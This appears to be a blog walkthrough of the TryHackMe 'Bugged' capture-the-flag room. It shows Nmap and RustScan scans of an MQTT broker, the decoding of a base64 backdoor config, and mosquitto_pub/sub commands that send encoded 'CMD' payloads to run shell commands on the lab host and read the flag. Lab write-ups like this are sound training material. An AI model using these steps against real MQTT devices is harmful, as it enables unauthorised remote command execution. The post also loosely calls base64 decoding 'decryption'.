Open in app

Sign in

Write

Sign in

Bugged || TryHackMe WalkThrough

Nihir Zala
5 min readOct 3, 2024

--

the intro to the room is:

John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?

and our question is:

What is the flag?

Let’s begin!

Step 1:

The first thing I did was scan the host with Nmap to find out that there were no open ports.

First scan-nmap, no open ports.

so I’ve tried RustScan to scan all the ports,

Second scan-RustScan, port 1883 is open.

found out that port 1883 is open, with the “MQTT” service, A quick search for this service, and I found out the purpose of this service.

MQTT (Message Queue Telemetry Transport) is a lightweight messaging protocol designed for Internet of Things (IoT) devices and communication with minimal network bandwidth and power consumption.

Makes sense for a smart home application.

now let’s scan just a bit more that port with:

nmap -A -p 1883 <host-ip>

and we’ve got a long list of Topics (read the Wikipedia page of MQTT. but in a sentence, topics are hierarchical strings that are used to identify the message destination or source.).

Topics and their most recent payloads.

some of the topics are in those formats:

$SYS/broker/#

you can read more about MQTT wildcards and topics at this link.
and some of them related directly to the smart house application, like:

livingroom/speaker
kitchen/toaster
storage/thermostat

but none of them are actually giving us any idea for the next step, so I’ve run the same scan again, after all, it makes sense that a smart house application traffic will change constantly.

Another aggressive scan, and still nothing special.

So the second scan did show us different payloads but all are similar to the last scan and still don’t give us any clue. So I ran another scan and this time I found something interesting.

Base 64 payload

a payload encoded with base64, in a strange topic.

yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config:

Let’s decrypt it.

Step 2:

I’ve copied the message to a file named “payload.txt”
and decrypt the message,

The encrypted message.

let’s analyze the message now,

“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”

Looks like the ID of who published that payload (we already saw similar ids in the first scans).

registered_commands”:[“HELP”,”CMD”,”SYS”]

we can understand that there is a way to communicate with this machine with those commands.

“pub_topic”:”U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub”
”sub_topic”:”XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub”

two topics, one for publishing and one for subscribing.

this payload was sent to a config topic so it probably has something more than just a message.

For the next step, we’re going to publish and subscribe to the topics we found and see what we are getting.

Step 3:

let’s start with the subscribe command:

mosquitto_sub -h 10.10.151.198 -p 1883 -t U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub

now for the publish command, we’ll try to execute the “HELP” command.

mosquitto_pub -h 10.10.151.198 -p 1883 -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m “HELP”

-h specify host ip.
-p specify port.
-t specify topic.

Right after sending the publish message I received another Base64 encrypted message at the subscribe window.

Another encrypted message.

After decrypting the message I’ve found the format for sending commands,

The decrypted message.

Let’s try to send a command using the given format!

Step 4:

So now we’ll encrypt the command we want to send to base64.

the first command will be “HELP” with no arguments given, I used the id we saw at the first step.

Converting the command to base64

now let’s publish the encrypted payload, look at the subscribe window,

The received payload.

Decrypt.

{“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”,”response”:”Message format:\n Base64({\n \”id\”: \”<Backdoor ID>\”,\n \”cmd\”: \”<Command>\”,\n \”arg\”: \”<arg>\”,\n })\n\nCommands:\n HELP: Display help message (takes no arg)\n CMD: Run a shell command\n SYS: Return system information (takes no arg)\n”}

There is a lot of /n but the idea is pretty clear, let’s try now to send the CMD command with ls as an argument, just the same way we did before.

and we’ve received another message:

decrypt:

{“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”,”response”:”flag.txt\n”}

and here is our flag!

now all that’s left for us is to encode the last command:

{“id”: “cdd1b1c01c404b0f-8e2261b357548b7d”, “cmd”: “CMD”, “arg”: “cat flag.txt”}

publish it as we did before as base64:

eyJpZCI6ICJjZGQxYjFjMDFjNDA0YjBmLThlMjI2MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0=

and decrypt the message we’ve got, and this is our flag!

Tryhackme
Tryhackme Walkthrough
Tryhackme Writeup
Cybersecruity
Bugged

--

--

Nihir Zala

Written by Nihir Zala

36 Followers

Hi there, I'm Nihir Zala—a Laravel developer from Gujrat, India, with over 2.5 years of professional experience. I also learning Penetesting from THM and HTB.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams